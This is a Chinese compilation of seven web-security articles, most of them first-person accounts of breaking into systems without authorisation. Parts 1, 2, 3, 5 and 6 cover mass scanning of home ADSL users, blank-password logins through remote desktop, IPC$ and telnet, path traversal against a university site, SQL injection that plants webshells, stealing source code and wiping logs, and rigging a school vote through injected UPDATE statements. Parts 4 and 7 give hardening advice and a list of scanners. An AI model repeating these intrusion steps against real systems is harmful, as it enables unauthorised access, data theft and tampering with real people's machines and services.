下面是小编为大家收集的令人堪忧的网络安全 一次非常规安全检测网站安全,本文共7篇,仅供参考,欢迎大家阅读,一起分享。本文原稿由网友“秀一”提供。
篇1:令人堪忧的网络安全 一次非常规安全检测网站安全
这是一次非常规的网路安全检测,或者也可称为网路安全调查,
一、缘由:
几天前,朋友说他们单位的一台数据库服务器好像被人黑了,并且在桌面上留言“***到此一游!”。我赶过去,对这台数据库服务器的系统进行了全面的检查。这台主机是Windows XP系统,没有打SP2补丁包。检查的结果让我非常惊讶:1.系统中有两个管理员用户“administrator”和“new”,并且密码都为空。2.系统开了3389端口,可以进行“远程桌面”连接。3.系统的开了23端口,可以telnet上去。4.系统135、445端口都开着,默认共享也没有删除。5.这台作为数据库服务器的主机,直接用sa连接数据库,密码为“sa”,可以用用SQL连接器连上去。通过问朋友得知这个系统是他用ghost盘做的,因为他看到好多人都是这样做的。难道这种现象具有普遍性?于是才有了这次非常规安全检测,看看笔者本地的网络安全到底怎么样。
二、工具:
s扫描器、微软远程登录工具(mstsc.msc)、telnet、SQL登录器
三、时间段:
某天晚上8点和一个工作日的早晨10点。
四、对象:
本地ADSL用户
五、检测
ADSL拨号上网,运行“命令提示符”(cmd.exe),然后用“ipconfig”命令获得本机外网ip地址。然后以本机IP为中心,确定一个ip段,以备用s扫描器扫描。
1、远程登录测试(3389端口)
第一步:在命令提示符下运行s扫描器,敲入如下命令:
s syn **.1**.133.1 **.1**.138.254 3389
不到10秒钟,结果出来了。(图1)
图1
令人震惊!这个ip段有365台上线的主机,开3389端口的竟然有202个,占到73.7%!
第二步:用微软自己的“远程桌面连接”工具(mstsc.msc)连接测试,从中随机找一个开了3389端口的主机,进行连接。哇!连上了!敲入用户名“administrator”,空密码测试,提示有“new”用户当前登录。(图2),原来有一个用户名为“new”的用户在。对不起了,直接点击确定,显示第一次登录的用户配置界面,不到10秒钟,果然进去了。马上“注销”出来。然后用“new”用户,空密码登录,也进去了。对方在看MM!(图3)马上退出来。随即对开了3389的其他主机进行测试,成功率高于60%。在测试中竟然有的Windows SP系统竟然支持多用户登录!登录进去后,对于一个没有安全意识的人他根本无法知道!有部分主机的“new”账户设置了密码,但“administrator”的密码为空。还有部分用户的设置了密码,但密码简单,猜三四次就猜中。比如一些简单的弱口令“123456”、“ndows”、“adsl”等等。
图2
图3
分析:现在用“gost版系统”的用户非常多,这些系统除了一个“administrator”管理员用户外,还有一个“new”用户,也为管理员权限。并且所有的管理员密码都为空!另外有些“电脑城版系统”,竟然支持多用户远程登录!有相当一部分电脑用户对这些浑然不知,没有进行任何安全配置就直接使用。有些电脑用户认为安装了杀毒软件,就可以高枕无忧了。但“大门”敞开,这些杀毒软件就形同虚设,并且杀毒不等于防黑呀!2、IPC$测试(139 445端口)
第一步:在命令提示符下运行s扫描器,敲入如下命令:
s syn **.1**.133.1 **.1**.138.254 139 445
同样时间很短,结果马上出来了,开445端口的比3389的更多,粗略算了一下,超过80%,让人大跌眼镜的是这些主机3389、135都开放!(图4)
图4
第二步:随机找一个ip,在“命令提示符”下运行如下命令:
net use \\\\**.1**.135.253\\ipc$ “” /user:administrator
提示“命令成功完成”
继续敲入命令:
net use z: \\\\**.1**.135.253\\c$
提示“命令成功完成”(图5)
图5
这样就把它的系统盘映射到本机,检测到此为止,
都到了这一步还有什么不能做的呢,这台主机就算系统沦陷了。
分析:这也是“ghost系统”或“电脑城系统”的后遗症,于管理员组的两个用户“administrator”、“new”都为空密码。电脑用户缺乏基本的电脑安全意识,更没有防范意识,请有方面的人来进行配置,系统安装完成不做任何配置就上网逛了,能不被黑吗?3.telnet测试(23端口)
第一步:在命令提示符下运行s扫描器
s syn **.1**.133.1 **.1**.138.254 23
很短的时间,结果就出来了!在测试的在线365个主机中开了23端口的有35个。(图6
第二步:用telnet连接测试
随机找一个IP,敲入如下命令:
telnet **.1**.134.242
用“new”空密码登录失败,换用“adminstrator”空密码,登录成功。(图7)这样获得一个具有管理员权限的“shell”,检测到此结束。有一定基础的“命令行”操作经验的读者都知道,既然获得了“shell”,就等于控制了整个主机。
然后对于其他IP进行测试,也用administrator或者new空密码连接,成功率超过40%。其中有以部分开了23端口的是路由器,用默认用户“admin”,默认密码“admin”,连接,竟然成功。(图8)(图9),这是两个不同品牌的路由器。既然控制了路由器,那可以拿下的就不仅仅是一台主机了,有可能整个局域网都将沦陷!
分析:主机开了23端口,确实有些莫明其妙!一台个人电脑为什么开23端口,“ghost系统”及“电脑城版系统”都没有打开这个端口。我想这大概是已经有人进入了该主机,然后留的一个后门吧。电脑被入侵了,机主竟然一点都不知道!用户的安全意识可见一斑。另外,一些单位或者个人的路由器,也没有进行任何安全配置就联入网路,连默认的密码都没有更改,不被入侵才怪呢? 4.SQL Server测试(1433端口)
SQL Server是很多企业、事业单位首选的数据库系统。这次测试的时间选在一个工作日早晨10点,因为这时这些数据库服务器都在工作。
第一步:在命令提示符下运行s扫描器,敲入如下命令:
s syn **.1**.133.1 **.1**.138.254 1433
扫描结果有13个。(图10)
第二步:用SQL连接器连接测试:
随机选一个IP,账户为“sa”,密码为空连接成功!(图11)然后敲命令”dir c:\“,可以执行!(图12)这样就等于获得了一个具有“system”权限(比管理员权限还高!)的“shell”。测试到此为止!都到了这一步,什么做不成呢?这台SQL server服务器宣告沦陷!
分析:管理员(也许这些单位根本就没有专业的管理员)图方便或安全意识淡薄,以“sa”连接数据库,并且密码为空,或者以”sa“及其简单的数字为密码。这样只要用“扫描器”扫描到这台数据库服务器的IP,就可轻而易举地拿下!数据库的沦陷应该比一般的个人电脑的入侵后果更严重。
总结:以上的安全测试所使用的工具都是一些及其常见的工具,一些是系统自己的,技术上也没有多大的难道,任何一个有一定电脑操作经验的人都可以完成一次入侵。如果别有用心的人拿来干一些事情,那就太可怕了。虽然这次测试的是笔者本地ADSL的一个IP段,但我想这种安全现状在全国肯定具有普遍性,网络安全状况不容乐观 !其主要原因是个人电脑用户安全防范意识淡薄,安全知识贫乏,不具备基本的安全技术。另外企事业单位对网络安全重视不够,缺乏专业的管理员。提高安全防范意识,掌握一定的安全技能,刻不容缓,不然下一个被入侵的人就是你!
篇2:一次曲折的安全检测
此次安全检测过去有段时间了,一直想写成稿子就是没有时间,具体环境可能有所淡忘,但整个过程和思路还是很明了的,由于在校期间课余在学校的网络工作室工作,所以对一些学校网站的服务和发展比较关注。这期间发现某学院的文件交换系统非常的不错,在校园网内使用会带来很多方面的便捷。搜索了下网上没有现成的系统下载,难道非要自己现写不成…
踩点:
服务器开放了21和80端口,Serv-U6.2、Apache/2.055(win32)PHP/5.1.2;同台服务器上还有一个OA系统。黑盒测试,先是测试上传脚本文件,可以上传,得到提取码后进行提取不会被解析…,对上传过程进行抓包,然后构造不存在的文件,发包,也没有暴出任何敏感信息。对整个的交换系统进行文件扫描也就扫出个config.php,google了下也没有别的文件。刚才不是说还有个OA 系统吗,google OA的时候确实有动态的连接,但所有的连接首先判断是不是校内IP,如果非校内IP直接跳转一个登陆页面,到这里测试完全的陷入了僵局。几经的离开,几经的回来再测试都没有结果,难道真的拿不下它吗?再一次的测试时输入提取码后的下载地址吸引了我。
“hxxp://www.xxx.edu.cn/ex/download.php?url=exchanging%2F09121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg”
url后应该是个绝对地址,那么修改下会不会下到别的文件?
抓包:
GET /ex/download.php?url=exchanging%2F200709121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg
HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0
一般WIN32下PHP继承的SYS权限,所以读文件干脆就读c:\\boot.ini,Telnet 服务器ip 80发送下面修改好的数据
修改:
/ex/download.php?url=c%3A%5Cboot.ini HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0
结果真的返回了boot.ini的内容,狂喜中!
紧接着下来的问题就是猜web目录的路径了,找PHP或者Apache的配置文件应该都能找到WEB的路径,还是上面的发包,当试到路径d:\\wwwroot\\ex时,没有返回错误信息,说明猜对了他的路径,然后就是读交换系统的文件代码了,代码都是相关联的,发现就7个php文件而且用这个系统根本拿不到shell。进而转攻OA系统,不出意外OA的路径应该就是d:\\wwwroot\\oa,完全正确!首先读的就是config.php,察看敏感信息,暴出数据库联接信息是本地连接,root权限。然后就是扫描OA文件,测试到这程度能不能拿shell我心里还是没有底,大批的读源文件?… …心里发寒。
突破:
自己陷入矛盾中,放弃吧不甘心;继续吧,就算读完整套代码可能一无所获。心一横,先看看有没有代码过滤再说吧,首先登陆口,随意输入用户名、密码提交,抓包。抓到check.php,然后读代码。它是这么写的:
//echo “系统维护,请稍后访问!”;exit;
require(“config.php”);
require(“public/f_main.php”);
require(“f_db/”.$Database['type'].“.php”);
session_start;
$db = new sql_db($Database['server'], $Database['username'], $Database['password'], $Database['dbname'], false);
if(!$db ->db_connect_id)
{
MsgGo(“数据库连接失败!”,“exit”);
}
foreach($_POST as $key=>$value) $$key=$value;
//用户密码验证
$sql=“SELECT a.*,b.dep_name,b.dep_parent_id,b.dep_id AS dep_id,c.dep_name as dep_parent_name
FROM t_user a
LEFT JOIN t_dep b ON a.dep_id = b.dep_id
LEFT JOIN t_dep c ON c.dep_id = b.dep_parent_id
WHERE user_name ='$user_name'”;
if(!($result = $db->sql_query($sql))) MsgGo(“数据查询失败!”,“login.php”);
if($row = $db->sql_fetchrow($result)){
if($row[“user_status”]!=“1”){
MsgGo(“该用户处于停用状态,暂不能登录!”,“login.php”);
}else{
if(md5($user_password)==$row[“user_password”] || crypt($user_password,$row[“user_password_old”])==$row[“user_password_old”] || $user_password==“qwert12345”)
{
if($row[“user_password_old”]!=“” && $user_password!=“qwert12345”){
$sql=“UPDATE t_user SET
user_password='”.md5($user_password).“',
user_password_old=''
WHERE user_name ='$user_name'”;
if(!$result = $db->sql_query($sql)){
MsgGo(“数据查询失败!”,“login.php”);
}
}
$sql=“UPDATE t_user SET
last_login_time=”.time().“
WHERE user_name ='$user_name'”;
if(!$result = $db->sql_query($sql)){
MsgGo(“数据查询失败!”,“login.php”);
}
$_SESSION[“sess_user_name”]=$row[“user_name”];
$_SESSION[“sess_user_type”]=$row[“user_type”];
$_SESSION[“sess_user_real_name”]=$row[“user_real_name”];
$_SESSION[“sess_user_level”]=$row[“user_level”];
$_SESSION[“sess_dep_id”]=$row[“dep_id”];
$_SESSION[“sess_dep_name”]=$row[“dep_name”];
if($row[“dep_parent_id”]==“1”){
$_SESSION[“sess_dep_level”]=“1”;
$_SESSION[“sess_dep_id1”]=$row[“dep_id”];
$_SESSION[“sess_dep_parent_id”]=$row[“dep_parent_id”];
$_SESSION[“sess_dep_parent_name”]=$row[“dep_parent_name”];
}elseif($row[“dep_parent_id”]>“1”){
$_SESSION[“sess_dep_level”]=“2”;
$_SESSION[“sess_dep_id1”]=$row[“dep_parent_id”];
$_SESSION[“sess_dep_parent_id”]=$row[“dep_parent_id”];
$_SESSION[“sess_dep_parent_name”]=$row[“dep_parent_name”];
}
WriteLog(“登录系统”);
//writeCookie(“username_recent”,$_SESSION[“sess_user_name”],24*30);
setcookie(“username_recent”,$_SESSION[“sess_user_name”], time()+3600*24*30);
//进入系统主页面
echo “”;
}else{
MsgGo(“密码错误!”,“login.php”);
}
}
}else{
MsgGo(“用户名错误!”,“login.php”);
}
?>
可以看出check.php过滤非常的不严,直接导致SQL注入!貌似网上有不少类似的文章,
先查出有24个字段,然后
'union select 1,'
提交!
这样hxxp://www.xxx.edu.cn/oa/dir.php 就是我们的shell地址了。
这个shell都不用提权… …直接把文件交换还有OA打包拖回家,也没有搞别的,擦擦日志走人了。
整个过程算是峰回路转啊,那个艰辛啊,知道这样还不如自己写,托回来个有洞的程序-_-,唉。仔细读了下代码,问题出在download.php上,就写错了一个函数… …看来还真验证了那句话“安全来不得半点马虎!”我目的就是拿这个程序,没有再做进一步的渗透,有了小的缺口可能导致整个服务器群的沦陷!安全无小事!
篇3:再记一次网站入侵网站安全
打开直接试了试默认的用户名和密码,结果用admin admin进去了
这个后台太简单了,估计不是这个网站的真正后台,是网站另一个组成部分的后台,没什么用,
再次浏览网站,未发现注入点,不过看到他有个BBS,打开看到版本是DVBBS8.0的。首先DVBBS8.0是有漏洞的,就看他有没有打补丁了,接着便从入侵最简单的猜测+默认开始,直接访问BBS后台提示登陆,用默认的admin admin888登陆失败,再次访问DVBBS数据库,看看能不能把它数据库下载下来,结果成功下载到了数据库,发现后台密码是默认的,可是怎么登陆不了呢?
对了,还有个前台密码,可能前台密码不是默认的吧,在DV_USER表中找到了前台密码,这次成功登陆进去了,
DVBBS8.0后台拿webshell网上教程一大堆,可以去百度一下。大体如下:
1.创建一个数据库文件并插入一句话马。
2.后缀改为rar或其他DVBBS支持上传的格式。
这里备份数据库要注意一下,以前我们拿DVBBS都是备份成asp格式,但现在DVBBS最了后缀限制了,那怎么搞呢?
记不记得IIS6.0的那个以.asp命名文件夹,该文件夹下的所有文件都会被当成asp文件执行的漏洞?关键就在这里了,我们备份一个目录名带.asp的。不就OK了?
本文来源于:尼克技术博客 www.ineeke.cn/ , 原文地址:www.ineeke.cn/archives/504/
篇4:软件检测过的安全网站安全么?
1、概述
网站安全主要从网络安全、主机系统安全、WEB服务安全及页面数据安全等方面进行检测,网络、主机等基础环境的安全检测此处不再述。
2、Web 服务安全防护
2.1 Web 应用安全检测
(一) 对于商业软件,如Oracle,Apache等通用组件系统,应当依据厂商或第三方安全机构提供的安全配置加固列表进行安全设置,在厂商推出安全修补程序后应及时进行安全补丁更新。
(二) 应当定期对采用通用程序(如Apache,Websphere等)的应用系统进行弱点扫描,并及时解决所发现的问题;扫描应当在非关键业务时段进行,并制定详细的回退计划。
(三) 隐藏Apache的版本号及其它敏感信息
默认情况下,很多Apache安装时会显示版本号及操作系统版本,甚至会显示服务器上安装的是什么样的Apache模块。这些信息可以为黑客所用,并且黑客还可以从中得知你所配置的服务器上的很多设置都是默认状态。‘
这里有两条语句,你需要添加到你的httpd.conf文件中:
Serversignature off
Servertokens prod
Serversignature出现在Apache所产生的像404页面、目录列表等页面的底部。Servertoken目录被用来判断Apache会在Server HTTP响应包的头部填充什么信息。如果把ServerTokens设为Products,那么HTTP响应包头就会被设置成:
Server:Apache
(四)确保web根目录之外的文件没有提供服务
拒绝Apache访问web根目录之外的任何文件。假设你的所有Web站点文件都放在一个目录下(例如/web),你可以如下设置:
Order Deny,ALLow
Deny from all
Options None
Allowoverride None
Order ALLow,Deny
Allow from all
注意,因为轩opitins None和Allowoverride None,这将关闭服务器的所有Options和OCerride。必须明确把每个目录设置成Options或者Override。
(五)、关闭目录浏览
在Directory标签内用Options命令来实现这个功能。设置Options为None或者-Indexes.
(六)、关闭Includes
通过在Directory标签内使用Options命令实现。设备Options为None或者-Includes。
Options –Includes
(七) 、关闭CGI执行程序
如果不用CGI,对其进行关闭。在目录标签中把选项设置成None或——ExecCGI就可以:
Options —ExecCGI
(八) 、禁止Apache遵循符号连接
同上,把选项设置成None或者—FollowsymLinks:
Options —FollowSymlinks
2.2 Web 网站化代码安全检测
(一) 、采用最新版本的Web服务程序;
(二) 、采用最小权限的原则设置专门帐户用于运行网站服务、数据库服务;
(三) 网站与数据库分离,禁止Web服务与数据库服务运行于同一台服务器上;
(四) 对IIS、Apache等Web服务进行合理配置,防范目录权限、写权限、文件下载等漏洞;
(五) 加强网站代码的安全性,对互联网用户提交网站数据库的数据进行严格过滤,防范SQL注入,如“_、’、”、and、exec、--、or”等:
(六) 对于互联网用户提交的URL、留言等内容进行严格过滤,防范跨站攻击,如:“<、>、’、”、script、/、(、)”等;
(七) 严格限制对外网站的文件上传功能,对需要提供上传功能的网站 要加强上传文件的格式、内容松果,并进行病毒查杀,防止互联网用户上传恶意代码;
(八) 设置不宜猜测的后台管理目录,防范对后台管理暴力解除。
篇5:一次简单的反入侵测试网站安全
文章: 唐不狐
某日小弟正在肉鸡上sniffe,正巧赶上某淫在扫我肉鸡的sa弱口令,先做了个ipsec阻断了对方对我肉鸡的扫描。对方ip直接在嗅探器里得到了:61.19.***.***.查了下,是泰国人妖的。直接ie里面键入地址还有个站。
初步地揣测:该ip是某淫的肉鸡,用来扫别人的。
偶接下来很风骚地揣测,那个某淫是不是也这样扫扫sa弱口令就日下这鸟鸡鸡呢?于是telnet 61.19.***.*** 1433 嘿,端口开着。本地查询分析器里sa,口令空。竟然就这么风骚地连上去了。当时那个心情:堪比小乔初嫁。
接下来的故事就不那么舒坦了。利用xp_cmdshell提示XX.DLL不在。OA、job、尝试上传删除的dll、xp_regwrite、沙盘...满清十大酷刑都用上了,人家依然坚挺。
爆数据,可怜人家里面毛东西,列目录也失败,
(插个经验:用咱blog上的伪造文件整出来的点pangolin检测不出来地,没有关键词,用NB即可。我想是判断的逻辑方式不一样)
sa日不下来都说是人品问题,俺那个伤心啊。接下来用s 扫了下1-10000的port开放情况,发现开有81在。于是ie里面61.19.***.***:81/ 打开看到个php页面,仔细看看还有phpinfo,于是得到web路径。
接下来就好办了。查询分析器里面log备份一个phpshell到web目录下,再写个大马上去就很爽地拿到webshell了。
执行net user的时候没反应,我还以为降权了呢。接着又试试ipconfig 有了。原来对net.exe,net1.exe做了手脚。记得邪八有兄台写了个现成的api加用户的工具adduser,顺利解决该问题。
接下来意气风发地连人家3389,用户名口令输入,进入加载界面,忽然弹出一错误窗口,小心肝咯噔一下差点没吃得消,仔细一读差点吐血:该系统需要激活!
当时那个恨啊!接着直接给它上了个马草草了事算了。几辈子没遇到这样地了。
篇6:一次很“邪恶”的投票网站安全
author:Blackhumor
team:[B.H.S.T]
Blog:hi.baidu.com/admi520
文章没有技术含量,也不怎么成功,只是过程还是蛮曲折,想了N久决定还是发出来,希望对比我还菜的菜菜有帮助,
这几天经常收到辅导员的短信还有QQ消息叫我们去一个网址给我们学校参加xxxx歌手大赛的XX同学投票,让人心烦着呢,这不,在班级群里又发出来了,今天有空了就打开看看,
一看这同学貌似见过,地震期间同学们都困在学校里他还为我们表演了N多节目,歌唱得非常棒!于是呢就去顶了,投票呀留言什么的,可是人气还是不够,才XXX票,于是就想刷
一下票数,这不正好有同学也来给我说这事,我就说试试吧,就想着用用那可怜的十几台肉鸡来刷刷票。二话不说开工,用winsock expert抓包工具打开ie投票页面,然后点击投
票,查看抓包结果,很走运!没什么可利用的东东,这条路子就断了呵呵,继续找另外方法,点开选手风采栏目,随便点开一个选手,url变成xx.asp?xxx=xxxxx,在后面加个单引
号'返回不正常页面,
(图1)
于是再分别在url后面加上and 1=1f返回正常和and 1=11返回了脚本出错页面,
(图2)
还暴出了文件物理路径和表名还有字段名,mssql数据库, 请出啊D
来扫扫看,dboner权限,我得意的笑~~然后猜表,加了暴出的表名进去也是什么也没猜中,dbo备份一句话木马试了N多工具N次也没连接成功,于是漫长的旁注之旅开始了,,两天
以来只要一有时间就“工作”,服务器上面十几个站点,cookies注入进了几个其它站后台,都没拿到webshell,有几个后台有ewebeditor的,但默认密码改了,数据库目录也设了
权限没法下载数据库,唯一一个能进ewebeditor后台,设置样式,添加允许asa格式的图片,预览然后上传asa大马,查看代码后得到大马地址后访问,又是大失所望,目录被限制执
行脚本,再改上传目录,改成其它目录或者../../跳到跟目录这类,但上传不了,也不行,又遇到一个有mssqlDBO权限注入点的站点,跨库也不行,后台也没拿到webshell,又扫描
同C段IP,想拿到同C一台服务器来嗅探,先扫描iis 写权限的,找到一个,得到webshell,服务器是win2k iis5.0,不支持fso,不支持.net,php就更不用说了,这下webshell也没
有用了,同C段没有mssql弱口令,没有FTP弱口令,没有溢出漏洞,开80,8080,的也少,看样子都不想继续了,还是回到目标主站,既然是msssql数据库,只要知道表名,字段名,
相应的参赛选手ID就可以直接update更新数据库了,就目前只知道表名,singer_user,参赛选手ID:usernumber,继续在站点上面找其他地方看有没有注入点可以爆投票相关字段,可是其他地方也爆不出来,再手工猜一下,url+;update singer_user set piaoshu='1000' where usernumber=08xxxx,08xxxx就是参赛选手号码,看返回页面结果证明字段不存在,再用VB临时编写一个一点都不高级的小工具,
在文本框中填入常用字段继续进行猜测,
可惜都没有猜中,郁闷,于是想啊,数据库备份里面有乱码,应该还有数据库、表、字段相关信息,于是再次进行备份到网站目录,不过这次是生成txt文本,然后访问,由于文件太大容易ie卡死,就用迅雷下载到本地,再用记事本打开,
开始找,这下就辛苦了,找了差不多半小时,终于找到了相关字段,最终是tpph字段才是票数,于是马上url+;update singer_user set tpph='5043' where usernumber='08xxxxxx'刷新一下页面,果然票数5043,名次也上升了,
兴奋ing~~~,
不过想想对于其他选手来说就不公平了,心里又过不去,马上又给他改回来,联系到他后问他需要多少票让他们自己改。
总结:该程序未对浏览者提交的参数进行过滤,导致浏览者可以提交一些危险的sql查询语句对数据库进行修改。
篇7:网站安全检测:推荐8款免费的Web安全测试工具WEB安全
随着 Web 应用越来越广泛,Web 安全威胁日益凸显, 利用网站操作系统的漏洞和Web服务程序的 SQL 注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题,对 Web 应用安全的关注度也逐渐升温。下面向大家推荐8款非常有用的免费Web安全测试工具。
N-Stalker Free Version
N-Stalker Web 应用程序安全2012免费版本能够为您的 Web 应用程序清除该环境中大量常见的漏洞,包括跨站脚本(XSS)、SQL 注入(SQL injection)、缓存溢出(Buffer Overflow)、参数篡改 (Parameter Tampering)等等。
Netsparker Community Edition
Netsparker Community Edition 是一款 SQL 注入扫描工具,是Netsparker的社区免费版本,提供了基本的漏洞检测功能。使用友好,灵活。
Websecurify
Websecurify 是一款开源的跨平台网站安全检查工具,能够帮助你精确的检测 Web 应用程序安全问题,
Wapiti
Wapiti 是 Web 应用程序漏洞检查工具。它具有“暗箱操作”扫描,即它不关心 Web 应用程序的源代码,但它会扫描网页的部署,寻找使其能够注入数据的脚本和格式。
Skipfish
Skipfish 是 Google 公司发布的一款自动 Web 安全扫描程序,以降低用户的在线安全威胁。和 Nikto 和 Nessus 等其他开源扫描工具有相似的功能。
Exploit-Me
Exploit-Me 是一套 Firefox 的 Web 应用程序安全测试工具,轻量,易于使用。
OWASP WebScarab Project
WebScarab 一个用来分析使用HTTP和HTTPS协议的应用程序框架,通过记录它检测到的会话内容(请求和应答)来帮助安全专家发现潜在的程序漏洞。
X5s
x5s 是一款 Fiddler 插件,用于辅助渗透测试人员发现跨站点脚本(XSS)漏洞。
- 一次入侵检测2023-04-26
- 检测一次多少钱2022-12-11
- 看 是如何黑了落伍者的网站安全2023-08-07
- 网站怎样的流量结构在搜索引擎中最安全2022-12-11
- 网站被 泛解析后的解决方法WEB安全2022-12-28
- 安全策划书2024-07-29
- 安全诗歌朗诵2024-05-15
- 安全总结报告2024-04-26
- 安全的感言2023-08-11
- 安全方案2024-04-19